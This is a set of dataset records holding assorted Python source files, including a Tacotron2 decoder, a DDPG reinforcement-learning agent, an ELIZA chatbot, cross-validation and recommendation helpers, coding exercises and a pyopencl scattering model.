self.prenet(previous_out) # (4, 1, 256)\n hidden, cell = decoder_hidden\n #context, mask = self.attention(hidden[:-1], encoder_out, mask)\n att_weights = self.attention(hidden,encoder_out)\n context=att_weights.bmm(encoder_out)#.squeeze(1)\n rnn_input = torch.cat([previous_out, context], dim=2)\n rnn_out, decoder_hidden = self.rnn(rnn_input, decoder_hidden)\n spec_frame = self.spec_out(torch.cat([rnn_out, context], dim=2)) # predict next audio frame\n stop_token = self.stop_out(torch.cat([rnn_out, context], dim=2)) # predict stop token\n spec_frame = spec_frame.permute(1, 0, 2)\n spec_frame = spec_frame + self.postnet(spec_frame) # add residual\n return spec_frame.permute(1, 0, 2), stop_token, decoder_hidden, mask\n\n\nclass Tacotron2(nn.Module):\n\n def __init__(self,in_size):\n super(Tacotron2, self).__init__()\n #self.encoder = Encoder(num_chars=in_size)\n self.embed=CustomEmbedding(in_size,hp.embed_size,hp.embed_drop)\n self.encoder=BaseEncoder(hp.embed_size,hp.enc_h_size,hp.enc_drop,hp.bidirectional,hp.rnn)\n #self.encoder = BaseEncoder(num_chars=in_size)\n\n self.decoder = Decoder()\n\n def forward(self, text,mel_targets):\n\n text=self.embed(text)\n encoder_output = self.encoder(text)\n frames, stop_tokens, masks = self.decode(encoder_output,mel_targets)\n return frames, stop_tokens, masks\n\n def get_path(self):\n return \"/taco_test/\"\n\n def decode(self, encoder_out,mel_targets,teacher_forcing_ratio=1.):\n import pdb; pdb.set_trace()\n batch_size,seq1_len, _ = encoder_out.size()\n maxlen=mel_targets.size(1)\n #outputs = Variable(encoder_out.data.new(maxlen, batch_size, hp.num_mels))\n #stop_tokens = Variable(outputs.data.new(maxlen, batch_size))\n #masks = torch.zeros(maxlen, batch_size, seq1_len)\n\n # start token spectrogram frame of zeros, starting mask of zeros\n #output = Variable(outputs.data.new(1, batch_size, hp.num_mels).fill_(0))\n output= torch.zeros((batch_size,1,hp.num_mels)).type(torch.cuda.FloatTensor)\n mask = self.decoder.init_mask(encoder_out) # get initial mask\n hidden = self.decoder.init_hidden(batch_size)\n for t in range(maxlen):\n output, stop_token, hidden, mask = self.decoder(output, encoder_out, hidden, mask)\n outputs[t] = output\n #import pdb; pdb.set_trace()\n stop_tokens[t] = stop_token.squeeze(0).squeeze(-1)\n masks[t] = mask.data\n # teacher forcing\n if random.random() < teacher_forcing_ratio:\n output = mel_targets[t].unsqueeze(0)\n return outputs, stop_tokens.transpose(1, 0), masks.permute(1, 2, 0) # batch, src, trg\n","sub_path":",/models/Tacotron2/Tacotron2_network.py","file_name":"Tacotron2_network.py","file_ext":"py","file_size_in_byte":8476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"490464768","text":"import random\nimport gym\nenv = gym.make('MountainCar-v0')\nenv.reset()\n# \nprint('開始進行遊戲')\nprint('終機端按ctrl-c則可結束遊戲')\nrandom_number = lambda:random.randint(0,2)\n\nwhile True:\n env.step(random_number())\n env.render()\n","sub_path":"unit1_test_gym.py","file_name":"unit1_test_gym.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25645977","text":"# -*- coding: utf-8 -*-\n__author__ = 'liudong'\n__date__ = '2019/10/18 8:25 PM'\nimport os\nimport time\n\"\"\"\n实现跑马灯的输出效果\n\"\"\"\ndef main():\n content = '北京欢迎你为你开天辟地。。。'\n while True:\n os.system('clear')\n print(content)\n time.sleep(0.2)\n content = content[1:] + content[0]\n\nif __name__ == '__main__':\n 
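Note on the Tacotron2 record above: `Tacotron2.decode` writes into `outputs`, `stop_tokens` and `masks`, yet the lines that would allocate them are commented out, so the loop raises a NameError on its first iteration. A minimal sketch of the missing allocations, inferred from the shapes the loop indexes (an assumption, not code from the source file):

    outputs = encoder_out.new_zeros(maxlen, batch_size, hp.num_mels)   # one mel frame per step
    stop_tokens = encoder_out.new_zeros(maxlen, batch_size)            # one stop logit per step
    masks = torch.zeros(maxlen, batch_size, seq1_len)                  # attention-mask history

These mirror the commented-out `Variable(...)` initializers directly above the loop.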
main()","sub_path":"Python/Python_Basic/practise_example/PaoMaDeng.py","file_name":"PaoMaDeng.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602680032","text":"# from nltk.chat import eliza, util\nimport nltk\n\nimport re\nimport random\n\npairs = nltk.chat.eliza.pairs\nreflections = nltk.chat.util.reflections\n\nclass elizaBot(nltk.chat.util.Chat):\n '''\n Inherit from `nltk.chat.eliza.eliza_chatbot` module and modify converse function\n '''\n def __init__(self, pairs, reflections={}):\n self._pairs = [(re.compile(x, re.IGNORECASE), y) for (x, y) in pairs]\n self._reflections = reflections\n self._regex = self._compile_reflections()\n # Add list of words that mark EOC\n self.escape = [\"bye\", \"good bye\", \"goodbye\"]\n\n def converse(self, user_input):\n \"\"\"Overrides the original converse model of the nltk.util.Chat class\n \"\"\"\n if user_input.lower() in self.escape:\n return user_input\n while user_input[-1] in \"!.\":\n user_input = user_input[:-1]\n response = self.respond(user_input)\n return response\n\nif __name__==\"__main__\":\n bot = elizaBot(pairs, reflections)\n while True:\n i = input(\"> \")\n resp = bot.converse(i)\n print(resp)\n\n","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"232563855","text":"# !/usr/bin/env/ python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nthis python file including basic functions frequently-used.\n\"\"\"\n\n__author__ = 'jay'\n\n\nimport jieba\nimport json\nfrom numpy import array, zeros\nfrom numpy.linalg import norm\nimport pandas.io.sql as sql\nfrom collections import defaultdict\n\nfrom source import stopwords\nfrom sql_api import mx_kol\nfrom profile_doc import Profile, Doc\nfrom classify_long_text.long_text_classify import long_text_classify\nfrom classify_long_text.liblinearutil import load_model\n\n\n############################################################################\n# model and tags_map for content tag calculation\nmodel_file = './classify_long_text/model_data/svm.model'\nmodel = load_model(model_file)\nlabels_map_file = './classify_long_text/model_data/labels_map.json'\ntags_dict = json.load(open(labels_map_file))\n# enable parallel word-cut mode\njieba.enable_parallel(2)\n############################################################################\n\n\ndef get_keywords(doc, set_weights=False, topk=30):\n \"\"\"\n get keyword vector or dictionary for given document.\n :param doc: str object.\n :param set_weights: default False, with each word having the same weight 1;\n set true if different weights are needed.\n :param topk: select top k words.\n :return: key words vector, list-like.\n \"\"\"\n # generally, there are a lot of spaces in the document, remove them.\n doc = ''.join(doc.split())\n if not isinstance(doc, unicode):\n doc = unicode(doc, 'utf8')\n words_list = jieba.cut(doc)\n # filter those words with length less than 2.\n words_list = [word for word in words_list if word not in stopwords and len(word) > 1]\n frequency = defaultdict(int)\n for word in words_list:\n frequency[word] += 1\n # sort word dict according to frequency.\n frequency = sorted(frequency.items(), key=lambda x: x[1], reverse=True)\n # get top k key words\n frequency = dict(frequency[0: topk+1])\n\n if set_weights:\n max_freq = max(frequency.values())\n frequency = {word: float(freq)/max_freq for word, freq 
in frequency.items()}\n return frequency\n else:\n return {word: 1 for word in frequency.keys()}\n\n\ndef keyword_similarity(keyword1, keyword2):\n \"\"\"\n calculate the similarity between two keyword vectors based on cosine distance.\n :param keyword1: keyword dict with word set as key, word weight as value.\n :param keyword2: same as above.\n :return: similarity value, float, between 0 and 1.\n \"\"\"\n keywords_set = list(set(keyword1.keys()).union(set(keyword2.keys())))\n vector1 = zeros(len(keywords_set))\n vector2 = zeros(len(keywords_set))\n for i in range(len(keywords_set)):\n word = keywords_set[i]\n vector1[i] = keyword1.get(word, 0)\n vector2[i] = keyword2.get(word, 0)\n\n return vector1.dot(vector2) / (norm(vector1) * norm(vector2))\n\n\ndef similarity(profile, doc, weight1=1, weight2=1, weight3=1):\n\n # industry_tag_weight = weight1\n # content_weight = weight2\n # content_features_weight = weight3\n\n pro_industry_tag, pro_content, pro_keywords = profile.get_triple_tuple()\n\n doc_industry_tag, doc_content_tags, doc_content_tag, doc_keywords = doc.get_triple_tuple()\n\n sim = 0.0\n sim += weight1 if pro_industry_tag == doc_industry_tag else 0\n sim += weight2 * sum([1 for word in doc_content_tags if word in pro_content.keys()])\n if doc_content_tag in pro_content.keys():\n sim += weight3 * keyword_similarity(pro_content[doc_content_tag], doc_keywords)\n else:\n sim += weight3 * keyword_similarity(pro_keywords, doc_keywords)\n\n return sim\n\n\ndef docs2pro_filtering(profile, docs, topk=10, threshold=10):\n\n result = [(doc.get_title(), similarity(profile, doc)) for doc in docs if similarity(profile, doc) < threshold]\n result.sort(key=lambda x: x[1], reverse=True)\n\n # return a top k list of open_id\n if len(docs) < topk:\n return [title for title, sim in result]\n return [result[i][0] for i in range(topk)]\n\n\ndef pros2doc_filtering(profiles, doc, topk=10, threshold=10):\n\n result = [(profile.get_user_id(), similarity(profile, doc)) for profile in profiles\\\n if similarity(profile, doc) < threshold]\n result.sort(key=lambda x: x[1], reverse=True)\n\n if len(profiles) < topk:\n return [user_id for user_id, sim in result]\n return [result[i][0] for i in range(topk)]\n\n\ndef get_profile(user_id):\n\n select_profile = u\"select * from mx_kol.user_profile where userid='%s'\" % user_id\n profile = sql.read_frame(select_profile, mx_kol)\n user_id = profile['userid'][0]\n industry_tag = profile['industry_tag'][0].decode('utf8')\n contents = profile['contents'][0]\n contents = json.loads(contents)\n keywords = profile['keywords'][0]\n keywords = json.loads(keywords)\n\n profile = Profile(user_id)\n profile.set_industry_tag(industry_tag)\n profile.set_content(contents)\n profile.set_keywords(keywords)\n\n return profile\n\n\ndef get_doc(url):\n\n select_user_text = u\"select userid, text, ext_data from mx_kol.weixin_kol_status where url='%s'\" % url\n # DataFrame object with columns('userid', 'text')\n df = sql.read_frame(select_user_text, mx_kol)\n user_id = df['userid'][0]\n doc = df['text'][0]\n # doc's keywords\n keywords = get_keywords(doc, True)\n ext_data = df['ext_data'][0]\n ext = json.loads(ext_data)\n # doc's content tag\n content_tag = ext.get('content_tags', None)\n if content_tag == None:\n content_tag = get_content_tag(doc)\n\n select_industry_tag = u\"select tag from mx_kol.mx_tag where id in (select tag_id from mx_kol.kol_tag_map \\\n where userid = '%s' and map_tag_type=%d and kol_type=%d)\" % (user_id, 1, 2) # 1 for industry tag, 2 for weixin\n 
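Note on `keyword_similarity` above: it expands both keyword dicts over the union of their vocabularies and returns the cosine of the two dense vectors. A tiny worked example with hypothetical inputs (not from the source):

    kw1 = {u'python': 1.0, u'crawler': 0.5}
    kw2 = {u'python': 1.0, u'django': 0.8}
    # union vocabulary: python, crawler, django
    # vector1 = [1.0, 0.5, 0.0]; vector2 = [1.0, 0.0, 0.8]
    # dot = 1.0; norms = sqrt(1.25) * sqrt(1.64)
    keyword_similarity(kw1, kw2)  # ~= 0.698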
select_content_tag = u\"select tag from mx_kol.mx_tag where id in (select tag_id from mx_kol.kol_tag_map \\\n where userid = '%s' and map_tag_type=%d and kol_type=%d)\" % (user_id, 2, 2) # 1 for industry tag, 2 for weixin\n df = sql.read_frame(select_industry_tag, mx_kol)\n industry_tag = unicode(df['tag'][0], 'utf8')\n\n df = sql.read_frame(select_content_tag, mx_kol)\n # user's content tags\n content_tags = [tag.decode('utf-8')for tag in df['tag'] if not isinstance(tag, unicode)]\n\n doc = Doc(user_id)\n doc.set_title(title)\n doc.set_industry_tag(industry_tag)\n doc.set_content(content_tags)\n doc.set_content_tag(content_tag)\n doc.set_keywords(keywords)\n\n return doc\n\n\ndef get_content_tag(doc):\n \"\"\"\n get content tag for given document\n :param doc: str object\n :return: document's content tag selected from totally 37 common tags, unicode object\n \"\"\"\n tag, res = long_text_classify(doc, model)\n return tags_dict[repr(tag).decode('utf8')]","sub_path":"basic_functions.py","file_name":"basic_functions.py","file_ext":"py","file_size_in_byte":6790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"90045209","text":"l = ['magical unicorns',19,'hello',98.98,'world']\r\n#l = [2,3,1,7,4,12]\r\nl = ['magical','unicorns']\r\nsumInt= 0\r\nallString = \"\"\r\nnum=len(l)\r\nfor i in l:\r\n result1=isinstance(i, int)\r\n if result1 == False:\r\n for j in l:\r\n result2=isinstance(j, str)\r\n if result2 == False:\r\n break\r\n if result2 == True:\r\n print (\"The array you entered is of string type\")\r\n for count in range(0,num):\r\n allString+=l[count]\r\n print (\"String:\",allString)\r\n\r\n elif result2 == False:\r\n print (\"The array you entered is of mixed type\")\r\n break\r\n\r\nif result1 == True:\r\n print (\"The array you entered is of integer type\")\r\n\r\n for count in range(0,num):\r\n sumInt+=l[count]\r\n print (sumInt)\r\n","sub_path":"listelementdatatype.py","file_name":"listelementdatatype.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"578626857","text":"def func1(k,i):\n a=list(str(k))\n b=0\n for j in a:\n if int(j)<=i:\n b+=1\n\n return b\n\ndef func2(n):\n s=str(n)+'='\n dic={}\n while n>1:\n for i in range(2,n+1):\n if n%i==0:\n dic[i]=dic.get(i,0)+1\n n=n//i\n break\n a=sorted(dic.items(),key=lambda x:x[0])\n for i in a:\n s+=str(i[0])+\"^\"+str(i[1])+'*'\n\n return s[:-1]\n\n\ndef func3(lst,v):\n lst2=[]\n for i in lst:\n a=sum(int(j) for j in list(str(i)))\n if a<v:\n lst2.append(i)\n return sorted(lst2,reverse=True)\n\n\n\ndef func4(x):\n return len(set(list(str(x))))\n\ndef func5(lst):\n lst1=[]\n lst2=[]\n for i in lst:\n if i%2==0:\n lst2.append(i)\n else:\n lst1.append(i)\n newlst=sorted(lst1)+sorted(lst2,reverse=True)\n return newlst\n\ndef func6(s):\n import re\n import math\n lst=re.findall('(-?\\d+,-?\\d+)',s)\n lst2=[]\n for i in range(len(lst)):\n lst2.append(tuple(map(int,lst[i].split(','))))\n return sorted(lst2,key=lambda x:(math.sqrt(x[0]**2+x[1]**2),-x[1]))\n\ndef func7(s):\n lst=s.split()\n dic={}\n for i in lst:\n dic[i]=dic.get(i,0)+1\n b=sorted(dic.items(),key=lambda x:(x[1],x[0]),reverse=True)\n return [b[i][0] for i in range(len(b))][0:3]\n\n\nif __name__=='__main__':\n # print(func3([1234, 2345, 5678, 8907],15))\n # print(func4(23389))\n # print(func6('(-3,4)(4,-3)(-4,-3)(3,4)'))\n # print(func7('hello hello hi apple'))\n pass\n 
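Note on `func2` in the haxinyi record above: it is a trial-division prime factorisation rendered as `n=p1^e1*p2^e2*...`, with the trailing `*` stripped by `s[:-1]`. Two hand-checked examples (not from the source):

    func2(12)  # '12=2^2*3^1'  (12 -> 2*6 -> 2*3 -> 3)
    func2(90)  # '90=2^1*3^2*5^1'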
#ps","sub_path":"Submit/haxinyi.py","file_name":"haxinyi.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"81672475","text":"import random\nimport numpy as np\nimport pandas as pd\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import GroupKFold\nfrom collections import Counter, defaultdict\n\n\ndef Read_data():\n # Read iris dataset\n iris = load_iris()\n df = pd.DataFrame(iris.data, columns=iris.feature_names)\n df[\"target\"] = iris.target\n\n # Define ID\n list_id = [\"A\", \"B\", \"C\", \"D\", \"E\"]\n df[\"ID\"] = np.random.choice(list_id, len(df))\n\n # Extract feature names\n features = iris.feature_names\n\n return df, features\n\n\ndef Count_y(y, groups):\n # y counts per group\n unique_num = np.max(y) + 1\n y_counts_per_group = defaultdict(lambda: np.zeros(unique_num))\n for label, g in zip(y, groups):\n y_counts_per_group[g][label] += 1\n\n return y_counts_per_group\n\n\ndef StratifiedGroupKFold(X, y, groups, features, k, seed = None):\n # Preparation\n max_y = np.max(y)\n y_counts_per_group = Count_y(y, groups)\n kf = GroupKFold(n_splits=k)\n\n for train_idx, val_idx in kf.split(X, y, groups):\n # Training dataset and validation dataset\n x_train = X.iloc[train_idx, :]\n id_train = x_train[\"ID\"].unique()\n x_train = x_train[features]\n\n x_val, y_val = X.iloc[val_idx, :], y.iloc[val_idx]\n id_val = x_val[\"ID\"].unique()\n x_val = x_val[features]\n\n # y counts of training dataset and validation dataset\n y_counts_train = np.zeros(max_y+1)\n y_counts_val = np.zeros(max_y+1)\n for id_ in id_train:\n y_counts_train += y_counts_per_group[id_]\n for id_ in id_val:\n y_counts_val += y_counts_per_group[id_]\n\n # Determination ratio of validation dataset\n numratio_train = y_counts_train / np.max(y_counts_train)\n stratified_count = np.ceil(y_counts_val[np.argmax(y_counts_train)] * numratio_train)\n stratified_count = stratified_count.astype(int)\n\n # Select validation dataset randomly\n val_idx = np.array([])\n np.random.seed(seed) \n for num in range(max_y+1):\n val_idx = np.append(val_idx, np.random.choice(y_val[y_val==num].index, stratified_count[num]))\n val_idx = val_idx.astype(int)\n \n yield train_idx, val_idx\n\n\ndef Get_distribution(y_vals):\n # Get distribution\n y_distr = Counter(y_vals)\n y_vals_sum = sum(y_distr.values())\n\n return [f\"{y_distr[i] / y_vals_sum:.2%}\" for i in range(np.max(y_vals) + 1)]\n\n\nif __name__ == \"__main__\":\n \n df_iris, features = Read_data()\n\n print(df_iris.head())\n\n train_x = df_iris.drop(\"target\", axis=1)\n train_y = df_iris[\"target\"]\n groups = df_iris[\"ID\"]\n\n distrs = [Get_distribution(train_y)]\n index = [\"all dataset\"]\n\n \n for fold, (train_idx, val_idx) in enumerate(StratifiedGroupKFold(X, y, groups, features, k=3)):\n\n print(f\"TRAIN_ID - fold {fold}:\", groups[train_idx].unique(), \n f\"TEST_ID - fold {fold}:\", groups[val_idx].unique())\n \n distrs.append(Get_distribution(y[train_idx]))\n index.append(f\"training set - fold {fold}\")\n distrs.append(Get_distribution(y[val_idx]))\n index.append(f\"validation set - fold {fold}\")\n\n print(pd.DataFrame(distrs, index=index, columns=[f\"Label {l}\" for l in range(np.max(y) + 1)]))\n","sub_path":"MachineLearning/StratifiedGroupKFold.py","file_name":"StratifiedGroupKFold.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"374307643","text":"# In a 
given grid, each cell can have one of three values:\r\n#\n#\n# \tthe value 0 representing an empty cell;\r\n# \tthe value 1 representing a fresh orange;\r\n# \tthe value 2 representing a rotten orange.\r\n#\n#\n# Every minute, any fresh orange that is adjacent (4-directionally) to a rotten orange becomes rotten.\r\n#\n# Return the minimum number of minutes that must elapse until no cell has a fresh orange.  If this is impossible, return -1 instead.\r\n#\n#  \r\n#\n#\n# Example 1:\r\n#\n#\n#\n#\n# Input: [[2,1,1],[1,1,0],[0,1,1]]\r\n# Output: 4\r\n#\n#\n#\n# Example 2:\r\n#\n#\n# Input: [[2,1,1],[0,1,1],[1,0,1]]\r\n# Output: -1\r\n# Explanation: The orange in the bottom left corner (row 2, column 0) is never rotten, because rotting only happens 4-directionally.\r\n#\n#\n#\n# Example 3:\r\n#\n#\n# Input: [[0,2]]\r\n# Output: 0\r\n# Explanation: Since there are already no fresh oranges at minute 0, the answer is just 0.\r\n#\n#\n#  \r\n#\n# Note:\r\n#\n#\n# \t1 <= grid.length <= 10\r\n# \t1 <= grid[0].length <= 10\r\n# \tgrid[i][j] is only 0, 1, or 2.\r\n#\n#\n#\n#\n#\n\n\nclass Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n m = len(grid)\n if m == 0:\n return -1\n n = len(grid[0])\n if n == 0:\n return -1\n fresh = set()\n q = []\n for i in range(m):\n for j in range(n):\n if grid[i][j] == 1:\n fresh.add((i, j))\n elif grid[i][j] == 2:\n q.append((i, j))\n t = 0\n d = [0, -1, 0, 1, 0]\n while len(fresh) != 0 and len(q) != 0:\n size = len(q)\n for i in range(size):\n x, y = q[i]\n for k in range(4):\n u, v = x + d[k], y + d[k + 1]\n if 0 <= u < m and 0 <= v < n and grid[u][v] == 1:\n grid[u][v] = 2\n q.append((u, v))\n fresh.remove((u, v))\n q = q[size:]\n t += 1\n return t if len(fresh) == 0 else -1\n \n","sub_path":"solutions/1036-rotting-oranges/rotting-oranges.py","file_name":"rotting-oranges.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"611432324","text":"import os\nfrom multiprocessing import Process,Pool\nimport time,random\n\n# def func(value):\n# print('child process %s running in port %d' % (value, os.getpid()))\n#\n#\n# if __name__ == '__main__':\n# print('parent port is %d '% (os.getpid()))\n# p = Process(target=func , args=('你好',))\n# p.start()\n# p.join()\n# print('child process end!!!')\n\n\ndef login_hu(name):\n print('task %d in %d port'% (name, os.getpid()))\n start = time.time()\n time.sleep(random.random()*3)\n end = time.time()\n print('task %d runing %s ' %(name, str(end-start)))\n\nif __name__ == '__main__':\n print('parent process is %d port'% (os.getpid()))\n p = Pool(4)\n for i in range(0,5):\n p.apply_async(login_hu, args=(i,))\n print('waiting subprocessing done!!!')\n p.close()\n p.join()\n print('all process done')\n\n\n\n\n\n","sub_path":"multiprocessing11.py","file_name":"multiprocessing11.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165164904","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\nimport random\nfrom collections import deque\n\n\n\nclass MLP(nn.Module):\n \"\"\" MLP with dense connections \"\"\"\n def __init__(self, input_size, output_size, hidden_size, num_hidden_layers=3):\n super().__init__()\n self.num_hidden_layers = num_hidden_layers\n hidden_size_aug = hidden_size + input_size\n self.linear_in = nn.Linear(input_size, 
hidden_size)\n hidden_layers = []\n for i in range(self.num_hidden_layers):\n hidden_layers.append(nn.Linear(hidden_size_aug, hidden_size))\n self.hidden_layers = nn.ModuleList(hidden_layers)\n self.linear_out = nn.Linear(hidden_size, output_size)\n\n def forward(self, inp):\n x = F.relu(self.linear_in(inp))\n for i in range(self.num_hidden_layers):\n x = torch.cat([x, inp], dim=1)\n x = F.relu(self.hidden_layers[i](x))\n return self.linear_out(x)\n\n## Critic (value) network maps state, action pair to value\nclass Critic(nn.Module):\n \"\"\" Single Q-networks \"\"\"\n def __init__(self, obs_size, act_size, hidden_size):\n super().__init__()\n self.net = MLP(obs_size+act_size, 1, hidden_size)\n\n def forward(self, state, action):\n state_action = torch.cat([state, action], 1)\n return self.net(state_action)\n\n## Actor directly maps states to action\nclass Actor(nn.Module):\n def __init__(self, obs_size, act_size, hidden_size, max_action):\n super().__init__()\n self.net = MLP(obs_size, act_size, hidden_size)\n self.max_action = max_action\n\n def forward(self, state):\n x = self.net(state)\n action = torch.tanh(x) * self.max_action\n return action\n\n def act(self, state, device, noise=0):\n state = torch.FloatTensor(state).to(device).unsqueeze(0)\n action = self.forward(state)\n return action[0].detach().cpu().numpy()\n\n\nclass DDPG:\n def __init__(self,device,obs_size,act_size,max_action=1,hidden_size=256,gamma=0.99,tau=0.005,policy_noise=0.2,\n \t\t\t\t\t\t\t\t\tnoise_clip=0.5,policy_freq=1,exploration_noise=0.1):\n self.device = device \n self.act_size = act_size\n self.max_action = max_action\n self.gamma = gamma\n self.tau = tau\n self.policy_noise = policy_noise\n self.noise_clip = noise_clip\n self.policy_freq = policy_freq\n self.exploration_noise = exploration_noise\n self._timestep = 0\n\t\n\n\t## Randomly initialize critic network\n self.critic = Critic(obs_size, act_size, hidden_size).to(device)\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=3e-4) ## using adam optimization\n \n ## Randomly initialize actor network\n self.actor = Actor(obs_size, act_size, hidden_size, max_action).to(device)\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=3e-4) ## using adam optimization\n \n\t#### The target networks are time-delayed copies of their original networks that slowly track the learned networks. Using these target value networks greatly improve stability in learning. Here’s why: In methods that do not use target networks, the update equations of the network are interdependent on the values calculated by the network itself, which makes it prone to divergence. 
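# A sketch of the slow tracking described above (not part of the original file):
# it is the soft / Polyak update, and the same rule appears verbatim in
# update_parameters() below with tau defaulting to 0.005:
#
#     theta_target <- (1 - tau) * theta_target + tau * theta
#
#     def soft_update(target_net, source_net, tau=0.005):
#         for t_p, s_p in zip(target_net.parameters(), source_net.parameters()):
#             t_p.data.copy_((1.0 - tau) * t_p.data + tau * s_p.data)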
####\n\t\n ## Randomly initialize critic target network\n self.critic_target = Critic(obs_size, act_size, hidden_size).to(device)\n for target_param, param in zip(self.critic_target.parameters(), self.critic.parameters()):\n target_param.data.copy_(param.data)\n \n ## Randomly initialize actor target\n self.actor_target = Actor(obs_size, act_size, hidden_size, max_action).to(device)\n for target_param, param in zip(self.actor_target.parameters(), self.actor.parameters()):\n target_param.data.copy_(param.data)\n \n ## Randomly initialize replay buffer\n self.replay_buffer = deque(maxlen=1000000)\n\n def act(self, state, train=True):\n action = self.actor.act(state, self.device)\n if train:\n ## Select action with exploration noise.\n action = (\n action + np.random.normal(0, self.exploration_noise, size=self.act_size)\n ).clip(-self.max_action, self.max_action)\n return action\n\n def update_parameters(self, batch_size=256):\n if len(self.replay_buffer) < batch_size:\n return\n\t## Select a batch of random sample from replay buffer\n batch = random.sample(self.replay_buffer, k=batch_size)\n state, action, reward, next_state, not_done = [torch.FloatTensor(t).to(self.device) for t in zip(*batch)]\n\n # Update critic\n with torch.no_grad():\n ## For continuous action spaces, exploration is done via adding noise to the action itself.\n noise = (torch.randn_like(action)*self.policy_noise).clamp(-self.noise_clip, self.noise_clip)\n \n ## original q value calculated using value network, not the target value network.\n q_original = self.critic(state, action)\n next_action = (self.actor_target(next_state) + noise).clamp(-self.max_action, self.max_action)\n q_next = self.critic_target(next_state, next_action)\n \n ## updated q value is calculated using target q network.\n ## The value network is updated similarly as is done in Q-learning. The updated Q value is obtained by the Bellman equation\n q_target = reward + not_done * self.gamma * q_next\n\n\n\t## We minimize the mean-squared loss between the updated Q value and the original Q value.\n critic_loss = F.mse_loss(q_original, q_target)\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n\t## For the policy function, our objective is to maximize the expected return\n ## To calculate the policy loss, we take the derivative of the objective function with respect to the policy parameters. 
Take the mean of the sum of gradients calculated from the mini-batch.\n actor_loss = -self.critic(state, self.actor(state)).mean()\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\t \n\t## Update target critic(value) network\n for target_param, param in zip(self.critic_target.parameters(), self.critic.parameters()):\n target_param.data.copy_((1.0-self.tau)*target_param.data + self.tau*param.data)\n\t \n\t## Update target actor(policy) network\n for target_param, param in zip(self.actor_target.parameters(), self.actor.parameters()):\n target_param.data.copy_((1.0-self.tau)*target_param.data + self.tau*param.data)\n \n def save(self, directory, name):\n torch.save(self.actor.state_dict(), '%s/%s_actor.pth' % (directory, name))\n torch.save(self.actor_target.state_dict(), '%s/%s_actor_target.pth' % (directory, name))\n \n torch.save(self.critic.state_dict(), '%s/%s_crtic_1.pth' % (directory, name))\n torch.save(self.critic_target.state_dict(), '%s/%s_critic_1_target.pth' % (directory, name))\n \n def load(self, directory, name):\n self.actor.load_state_dict(torch.load('%s/%s_actor.pth' % (directory, name), map_location=lambda storage, loc: storage))\n self.actor_target.load_state_dict(torch.load('%s/%s_actor_target.pth' % (directory, name), map_location=lambda storage, loc: storage))\n \n self.critic.load_state_dict(torch.load('%s/%s_crtic_1.pth' % (directory, name), map_location=lambda storage, loc: storage))\n self.critic_target.load_state_dict(torch.load('%s/%s_critic_1_target.pth' % (directory, name), map_location=lambda storage, loc: storage))\n \n def load_actor(self, directory, name):\n self.actor.load_state_dict(torch.load('%s/%s_actor.pth' % (directory, name), map_location=lambda storage, loc: storage))\n self.actor_target.load_state_dict(torch.load('%s/%s_actor_target.pth' % (directory, name), map_location=lambda storage, loc: storage))\n","sub_path":"ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"624646976","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pyopencl as cl\nfrom Models.weights import GaussianDispersion\nfrom sasmodel import set_precision\n\n\nclass GpuLamellar(object):\n PARS = {\n 'scale':1, 'bi_thick':1, 'sld_bi':1e-6, 'sld_sol':0, 'background':0,\n }\n PD_PARS = {'bi_thick'}\n def __init__(self, qx, qy, dtype='float32'):\n\n #create context, queue, and build program\n self.ctx = cl.create_some_context()\n self.queue = cl.CommandQueue(self.ctx)\n src,qx,qy = set_precision(open('Kernel/Kernel-Lamellar.cpp').read(), qx, qy, dtype=dtype)\n self.prg = cl.Program(self.ctx, src).build()\n self.qx, self.qy = qx, qy\n\n #buffers\n mf = cl.mem_flags\n self.qx_b = cl.Buffer(self.ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=self.qx)\n self.qy_b = cl.Buffer(self.ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=self.qy)\n self.res_b = cl.Buffer(self.ctx, mf.WRITE_ONLY, qx.nbytes)\n self.res = np.empty_like(self.qx)\n\n def eval(self, pars):\n\n bi_thick = GaussianDispersion(int(pars['bi_thick_pd_n']), pars['bi_thick_pd'], pars['bi_thick_pd_nsigma'])\n bi_thick.value, bi_thick.weight = bi_thick.get_weights(pars['bi_thick'], 0, 10000, True)\n\n sum, norm = 0.0, 0.0\n sub = pars['sld_bi'] - pars['sld_sol']\n\n real = np.float32 if self.qx.dtype == np.dtype('float32') else np.float64\n for i in xrange(len(bi_thick.weight)):\n self.prg.LamellarKernel(self.queue, 